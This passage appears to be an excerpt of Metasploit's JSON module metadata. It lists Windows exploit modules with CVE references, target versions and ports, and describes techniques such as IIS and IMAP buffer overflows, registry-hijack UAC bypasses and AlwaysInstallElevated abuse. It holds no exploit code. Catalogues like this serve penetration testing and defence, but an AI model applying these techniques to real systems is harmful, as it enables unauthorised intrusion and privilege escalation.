"targets": [
"Windows 2000 SP0-SP4 English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/imap/novell_netmail_status.rb",
"is_install_path": true,
"ref_name": "windows/imap/novell_netmail_status",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/novell_netmail_subscribe": {
"name": "Novell NetMail IMAP SUBSCRIBE Buffer Overflow",
"full_name": "exploit/windows/imap/novell_netmail_subscribe",
"rank": 200,
"disclosure_date": "2006-12-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.",
"references": [
"CVE-2006-6761",
"OSVDB-31360",
"BID-21728",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0-SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/novell_netmail_subscribe.rb",
"is_install_path": true,
"ref_name": "windows/imap/novell_netmail_subscribe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/isapi/ms00_094_pbserver": {
"name": "MS00-094 Microsoft IIS Phone Book Service Overflow",
"full_name": "exploit/windows/isapi/ms00_094_pbserver",
"rank": 400,
"disclosure_date": "2000-12-04",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This is an exploit for the Phone Book Service /pbserver/pbserver.dll\n described in MS00-094. By sending an overly long URL argument\n for phone book updates, it is possible to overwrite the stack. This\n module has only been tested against Windows 2000 SP1.",
"references": [
"CVE-2000-1089",
"OSVDB-463",
"BID-2048",
"MSB-MS00-094"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 SP1",
"Windows 2000 SP0",
"Windows NT SP6"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/isapi/ms00_094_pbserver.rb",
"is_install_path": true,
"ref_name": "windows/isapi/ms00_094_pbserver",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/isapi/ms03_022_nsiislog_post": {
"name": "MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow",
"full_name": "exploit/windows/isapi/ms03_022_nsiislog_post",
"rank": 400,
"disclosure_date": "2003-06-25",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits a buffer overflow found in the nsiislog.dll\n ISAPI filter that comes with Windows Media Server. This\n module will also work against the 'patched' MS03-019\n version. This vulnerability was addressed by MS03-022.",
"references": [
"CVE-2003-0349",
"OSVDB-4535",
"BID-8035",
"MSB-MS03-022",
"URL-http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Brute Force",
"Windows 2000 -MS03-019",
"Windows 2000 +MS03-019",
"Windows XP -MS03-019"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb",
"is_install_path": true,
"ref_name": "windows/isapi/ms03_022_nsiislog_post",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/isapi/ms03_051_fp30reg_chunked": {
"name": "MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow",
"full_name": "exploit/windows/isapi/ms03_051_fp30reg_chunked",
"rank": 400,
"disclosure_date": "2003-11-11",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This is an exploit for the chunked encoding buffer overflow\n described in MS03-051 and originally reported by Brett\n Moore. This particular module works against versions of\n Windows 2000 between SP0 and SP3. Service Pack 4 fixes the\n issue.",
"references": [
"CVE-2003-0822",
"OSVDB-2952",
"BID-9007",
"MSB-MS03-051"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 SP0-SP3",
"Windows 2000 07/22/02",
"Windows 2000 10/06/99"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb",
"is_install_path": true,
"ref_name": "windows/isapi/ms03_051_fp30reg_chunked",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/isapi/rsa_webagent_redirect": {
"name": "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",
"full_name": "exploit/windows/isapi/rsa_webagent_redirect",
"rank": 400,
"disclosure_date": "2005-10-21",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the SecurID Web\n Agent for IIS. This ISAPI filter runs in-process with\n inetinfo.exe, so any attempt to exploit this flaw will result\n in the termination and potential restart of the IIS service.",
"references": [
"CVE-2005-4734",
"OSVDB-20151"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"RSA WebAgent 5.2",
"RSA WebAgent 5.3",
"RSA WebAgent 5.2 on Windows 2000 English",
"RSA WebAgent 5.3 on Windows 2000 English",
"RSA WebAgent 5.2 on Windows XP SP0-SP1 English",
"RSA WebAgent 5.3 on Windows XP SP0-SP1 English",
"RSA WebAgent 5.2 on Windows XP SP2 English",
"RSA WebAgent 5.3 on Windows XP SP2 English",
"RSA WebAgent 5.2 on Windows 2003 English SP0",
"RSA WebAgent 5.3 on Windows 2003 English SP0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/isapi/rsa_webagent_redirect.rb",
"is_install_path": true,
"ref_name": "windows/isapi/rsa_webagent_redirect",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/isapi/w3who_query": {
"name": "Microsoft IIS ISAPI w3who.dll Query String Overflow",
"full_name": "exploit/windows/isapi/w3who_query",
"rank": 400,
"disclosure_date": "2004-12-06",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the w3who.dll ISAPI\n application. This vulnerability was discovered by Nicolas\n Gregoire and this code has been successfully tested against\n Windows 2000 and Windows XP (SP2). When exploiting Windows\n XP, the payload must call RevertToSelf before it will be\n able to spawn a command shell.",
"references": [
"CVE-2004-1134",
"OSVDB-12258",
"URL-http://www.exaprobe.com/labs/advisories/esa-2004-1206.html",
"BID-11820"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Detection",
"Windows 2000 RESKIT DLL [Windows 2000]",
"Windows 2000 RESKIT DLL [Windows XP]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/isapi/w3who_query.rb",
"is_install_path": true,
"ref_name": "windows/isapi/w3who_query",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ldap/imail_thc": {
"name": "IMail LDAP Service Buffer Overflow",
"full_name": "exploit/windows/ldap/imail_thc",
"rank": 200,
"disclosure_date": "2004-02-17",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits a buffer overflow in the LDAP service that is\n part of the IMail product. This module was tested against\n version 7.10 and 8.5, both running on Windows 2000.",
"references": [
"CVE-2004-0297",
"OSVDB-3984",
"BID-9682",
"URL-http://secunia.com/advisories/10880/"
],
"platform": "Windows",
"arch": "",
"rport": 389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 English",
"Windows 2000 IMail 8.x"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ldap/imail_thc.rb",
"is_install_path": true,
"ref_name": "windows/ldap/imail_thc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ldap/pgp_keyserver7": {
"name": "Network Associates PGP KeyServer 7 LDAP Buffer Overflow",
"full_name": "exploit/windows/ldap/pgp_keyserver7",
"rank": 400,
"disclosure_date": "2001-07-16",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the LDAP service that is\n part of the NAI PGP Enterprise product suite. This module was tested\n against PGP KeyServer v7.0. Due to space restrictions, egghunter is\n used to find our payload - therefore you may wish to adjust WfsDelay.",
"references": [
"CVE-2001-1320",
"OSVDB-4742",
"BID-3046",
"URL-http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/"
],
"platform": "Windows",
"arch": "",
"rport": 389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal PGPcertd.exe"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/ldap/pgp_keyserver7.rb",
"is_install_path": true,
"ref_name": "windows/ldap/pgp_keyserver7",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/license/calicclnt_getconfig": {
"name": "Computer Associates License Client GETCONFIG Overflow",
"full_name": "exploit/windows/license/calicclnt_getconfig",
"rank": 200,
"disclosure_date": "2005-03-02",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the CA License Client\n service. This exploit will only work if your IP address can be\n resolved from the target system's point of view. This can be\n accomplished on a local network by running the 'nmbd' service\n that comes with Samba. If you are running this exploit from\n Windows and do not filter udp port 137, this should not be a\n problem (if the target is on the same network segment). Due to\n the bugginess of the software, you are only allowed one connection\n to the agent port before it starts ignoring you. If it wasn't for this\n issue, it would be possible to repeatedly exploit this bug.",
"references": [
"CVE-2005-0581",
"OSVDB-14389",
"BID-12705",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213"
],
"platform": "Windows",
"arch": "",
"rport": 10203,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 English",
"Windows XP English SP0-1",
"Windows XP English SP2",
"Windows 2003 English SP0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/license/calicclnt_getconfig.rb",
"is_install_path": true,
"ref_name": "windows/license/calicclnt_getconfig",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/license/calicserv_getconfig": {
"name": "Computer Associates License Server GETCONFIG Overflow",
"full_name": "exploit/windows/license/calicserv_getconfig",
"rank": 300,
"disclosure_date": "2005-03-02",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the CA License Server\n network service. By sending an excessively long GETCONFIG\n packet, the stack may be overwritten.",
"references": [
"CVE-2005-0581",
"OSVDB-14389",
"BID-12705",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213"
],
"platform": "Windows",
"arch": "",
"rport": 10202,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 English",
"Windows XP English SP0-1",
"Windows XP English SP2",
"Windows 2003 English SP0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/license/calicserv_getconfig.rb",
"is_install_path": true,
"ref_name": "windows/license/calicserv_getconfig",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/license/flexnet_lmgrd_bof": {
"name": "FlexNet License Server Manager lmgrd Buffer Overflow",
"full_name": "exploit/windows/license/flexnet_lmgrd_bof",
"rank": 300,
"disclosure_date": "2012-03-23",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Alexander Gavrun",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in the FlexNet\n License Server Manager.\n\n The vulnerability is due to the insecure usage of memcpy\n in the lmgrd service when handling network packets, which\n results in a stack buffer overflow.\n\n In order to improve reliability, this module will make lots of\n connections to lmgrd during each attempt to maximize its success.",
"references": [
"OSVDB-81899",
"BID-52718",
"ZDI-12-052",
"URL-http://aluigi.altervista.org/adv/lmgrd_1-adv.txt",
"URL-http://www.flexerasoftware.com/pl/13057.htm"
],
"platform": "Windows",
"arch": "",
"rport": 27000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Debug",
"Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3",
"Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3",
"Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/license/flexnet_lmgrd_bof.rb",
"is_install_path": true,
"ref_name": "windows/license/flexnet_lmgrd_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/license/sentinel_lm7_udp": {
"name": "SentinelLM UDP Buffer Overflow",
"full_name": "exploit/windows/license/sentinel_lm7_udp",
"rank": 200,
"disclosure_date": "2005-03-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a simple stack buffer overflow in the Sentinel\n License Manager. The SentinelLM service is installed with a\n wide selection of products and seems particularly popular with\n academic products. If the wrong target value is selected,\n the service will crash and not restart.",
"references": [
"CVE-2005-0353",
"OSVDB-14605",
"BID-12742"
],
"platform": "Windows",
"arch": "",
"rport": 5093,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6",
"SentinelLM 7.2.0.0 Windows 2000 English",
"SentinelLM 7.2.0.0 Windows 2000 German",
"SentinelLM 7.2.0.0 Windows XP English SP0/SP1",
"SentinelLM 7.2.0.0 Windows 2003 English SP0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/license/sentinel_lm7_udp.rb",
"is_install_path": true,
"ref_name": "windows/license/sentinel_lm7_udp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/adobe_sandbox_adobecollabsync": {
"name": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",
"full_name": "exploit/windows/local/adobe_sandbox_adobecollabsync",
"rank": 500,
"disclosure_date": "2013-05-14",
"type": "exploit",
"author": [
"Felipe Andres Manzano",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability on Adobe Reader X Sandbox. The\n vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe\n process to write register values which can be used to trigger a buffer overflow on\n the AdobeCollabSync component, allowing to achieve Medium Integrity Level\n privileges from a Low Integrity AcroRd32.exe process. This module has been tested\n successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.",
"references": [
"CVE-2013-2730",
"OSVDB-93355",
"URL-http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader X 10.1.4 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb",
"is_install_path": true,
"ref_name": "windows/local/adobe_sandbox_adobecollabsync",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/agnitum_outpost_acs": {
"name": "Agnitum Outpost Internet Security Local Privilege Escalation",
"full_name": "exploit/windows/local/agnitum_outpost_acs",
"rank": 600,
"disclosure_date": "2013-08-02",
"type": "exploit",
"author": [
"Ahmad Moghimi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability on Agnitum Outpost Internet\n Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load\n arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary\n code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with\n Agnitum Outpost Internet Security 8.1 (32-bit and 64-bit versions).",
"references": [
"OSVDB-96208",
"EDB-27282"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Agnitum Outpost Internet Security 8.1"
],
"mod_time": "2018-06-14 15:15:29 +0000",
"path": "/modules/exploits/windows/local/agnitum_outpost_acs.rb",
"is_install_path": true,
"ref_name": "windows/local/agnitum_outpost_acs",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/alpc_taskscheduler": {
"name": "Microsoft Windows ALPC Task Scheduler Local Privilege Elevation",
"full_name": "exploit/windows/local/alpc_taskscheduler",
"rank": 300,
"disclosure_date": "2018-08-27",
"type": "exploit",
"author": [
"SandboxEscaper",
"bwatters-r7",
"asoto-r7",
"Jacob Robles"
],
"description": "On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented\n by the task scheduler service can be used to write arbitrary DACLs to `.job` files located\n in `c:\\windows\\tasks` because the scheduler does not use impersonation when checking this\n location. Since users can create files in the `c:\\windows\\tasks` folder, a hardlink can be\n created to a file the user has read access to. After creating a hardlink, the vulnerability\n can be triggered to set the DACL on the linked file.\n\n WARNING:\n The PrintConfig.dll (%windir%\\system32\\driverstore\\filerepository\\prnms003*) on the target host\n will be overwritten when the exploit runs.\n\n This module has been tested against Windows 10 Pro x64.",
"references": [
"CVE-2018-8440",
"URL-https://github.com/SandboxEscaper/randomrepo/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 10 x64"
],
"mod_time": "2018-09-26 21:13:37 +0000",
"path": "/modules/exploits/windows/local/alpc_taskscheduler.rb",
"is_install_path": true,
"ref_name": "windows/local/alpc_taskscheduler",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"os-resource-loss"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_windows/local/always_install_elevated": {
"name": "Windows AlwaysInstallElevated MSI",
"full_name": "exploit/windows/local/always_install_elevated",
"rank": 600,
"disclosure_date": "2010-03-18",
"type": "exploit",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Parvez Anwar"
],
"description": "This module checks the AlwaysInstallElevated registry keys which dictate if\n .MSI files should be installed with elevated privileges (NT AUTHORITY\\SYSTEM).\n The generated .MSI file has an embedded executable which is extracted and run\n by the installer. After execution the .MSI file intentionally fails installation\n (by calling some invalid VBS) to prevent it being registered on the system.\n By running this with the /quiet argument the error will not be seen by the user.",
"references": [
"URL-http://www.greyhathacker.net/?p=185",
"URL-http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx",
"URL-http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/always_install_elevated.rb",
"is_install_path": true,
"ref_name": "windows/local/always_install_elevated",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/applocker_bypass": {
"name": "AppLocker Execution Prevention Bypass",
"full_name": "exploit/windows/local/applocker_bypass",
"rank": 600,
"disclosure_date": "2015-08-03",
"type": "exploit",
"author": [
"Casey Smith",
"OJ Reeves"
],
"description": "This module will generate a .NET service executable on the target and utilize\n InstallUtil to run the payload bypassing the AppLocker protection.\n\n Currently only the InstallUtil method is provided, but future methods can be\n added easily.",
"references": [
"URL-https://gist.github.com/subTee/fac6af078937dda81e57"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2018-05-23 13:44:53 +0000",
"path": "/modules/exploits/windows/local/applocker_bypass.rb",
"is_install_path": true,
"ref_name": "windows/local/applocker_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ask": {
"name": "Windows Escalate UAC Execute RunAs",
"full_name": "exploit/windows/local/ask",
"rank": 600,
"disclosure_date": "2012-01-03",
"type": "exploit",
"author": [
"mubix <mubix@hak5.org>",
"b00stfr3ak"
],
"description": "This module will attempt to elevate execution level using\n the ShellExecute undocumented RunAs flag to bypass low\n UAC settings.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ask.rb",
"is_install_path": true,
"ref_name": "windows/local/ask",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bthpan": {
"name": "MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation",
"full_name": "exploit/windows/local/bthpan",
"rank": 200,
"disclosure_date": "2014-07-18",
"type": "exploit",
"author": [
"Matt Bergin <level@korelogic.com>",
"Jay Smith <jsmith@korelogic.com>"
],
"description": "A vulnerability within Microsoft Bluetooth Personal Area Networking module,\n BthPan.sys, can allow an attacker to inject memory controlled by the attacker\n into an arbitrary location. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile.",
"references": [
"MSB-MS14-062",
"CVE-2014-4971",
"URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt",
"OSVDB-109387"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/bthpan.rb",
"is_install_path": true,
"ref_name": "windows/local/bthpan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac": {
"name": "Windows Escalate UAC Protection Bypass",
"full_name": "exploit/windows/local/bypassuac",
"rank": 600,
"disclosure_date": "2010-12-31",
"type": "exploit",
"author": [
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>",
"mitnick",
"mubix <mubix@hak5.org>"
],
"description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off.",
"references": [
"URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/bypassuac.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_comhijack": {
"name": "Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)",
"full_name": "exploit/windows/local/bypassuac_comhijack",
"rank": 600,
"disclosure_date": "1900-01-01",
"type": "exploit",
"author": [
"Matt Nelson",
"b33f",
"OJ Reeves"
],
"description": "This module will bypass Windows UAC by creating COM handler registry entries in the\n HKCU hive. When certain high integrity processes are loaded, these registry entries\n are referenced resulting in the process loading user-controlled DLLs. These DLLs\n contain the payloads that result in elevated sessions. Registry key modifications\n are cleaned up after payload invocation.\n\n This module requires the architecture of the payload to match the OS, but the\n current low-privilege Meterpreter session architecture can be different. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.\n\n This module invokes the target binary via cmd.exe on the target. Therefore if\n cmd.exe access is restricted, this module will not run correctly.",
"references": [
"URL-https://wikileaks.org/ciav7p1/cms/page_13763373.html",
"URL-https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-03 13:36:29 +0000",
"path": "/modules/exploits/windows/local/bypassuac_comhijack.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_comhijack",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_eventvwr": {
"name": "Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)",
"full_name": "exploit/windows/local/bypassuac_eventvwr",
"rank": 600,
"disclosure_date": "2016-08-15",
"type": "exploit",
"author": [
"Matt Nelson",
"Matt Graeber",
"OJ Reeves"
],
"description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows Event Viewer is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2018-10-31 16:31:52 +0000",
"path": "/modules/exploits/windows/local/bypassuac_eventvwr.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_eventvwr",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_fodhelper": {
"name": "Windows UAC Protection Bypass (Via FodHelper Registry Key)",
"full_name": "exploit/windows/local/bypassuac_fodhelper",
"rank": 600,
"disclosure_date": "2017-05-12",
"type": "exploit",
"author": [
"winscriptingblog",
"amaloteaux <alex_maloteaux@metasploit.com>"
],
"description": "This module will bypass Windows 10 UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/bypassuac_fodhelper.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_fodhelper",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_injection": {
"name": "Windows Escalate UAC Protection Bypass (In Memory Injection)",
"full_name": "exploit/windows/local/bypassuac_injection",
"rank": 600,
"disclosure_date": "2010-12-31",
"type": "exploit",
"author": [
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>",
"mitnick",
"mubix <mubix@hak5.org>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Lesage",
"OJ Reeves"
],
"description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off. This module uses the Reflective DLL Injection\n technique to drop only the DLL payload binary instead of three separate\n binaries in the standard technique. However, it requires the correct\n architecture to be selected, (use x64 for SYSWOW64 systems also).\n If specifying EXE::Custom your DLL should call ExitProcess() after starting\n your payload in a separate process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/bypassuac_injection.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_injection_winsxs": {
"name": "Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS",
"full_name": "exploit/windows/local/bypassuac_injection_winsxs",
"rank": 600,
"disclosure_date": "2017-04-06",
"type": "exploit",
"author": [
"Ernesto Fernandez \"L3cr0f\" <ernesto.fernpro@gmail.com>"
],
"description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off by abusing the way \"WinSxS\" works in Windows\n systems. This module uses the Reflective DLL Injection technique to drop\n only the DLL payload binary instead of three separate binaries in the\n standard technique. However, it requires the correct architecture to be\n selected, (use x64 for SYSWOW64 systems also).",
"references": [
"URL-https://github.com/L3cr0f/DccwBypassUAC"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-06-18 11:34:58 +0000",
"path": "/modules/exploits/windows/local/bypassuac_injection_winsxs.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_injection_winsxs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_sluihijack": {
"name": "Windows UAC Protection Bypass (Via Slui File Handler Hijack)",
"full_name": "exploit/windows/local/bypassuac_sluihijack",
"rank": 600,
"disclosure_date": "2018-01-15",
"type": "exploit",
"author": [
"bytecode-77",
"gushmazuko"
],
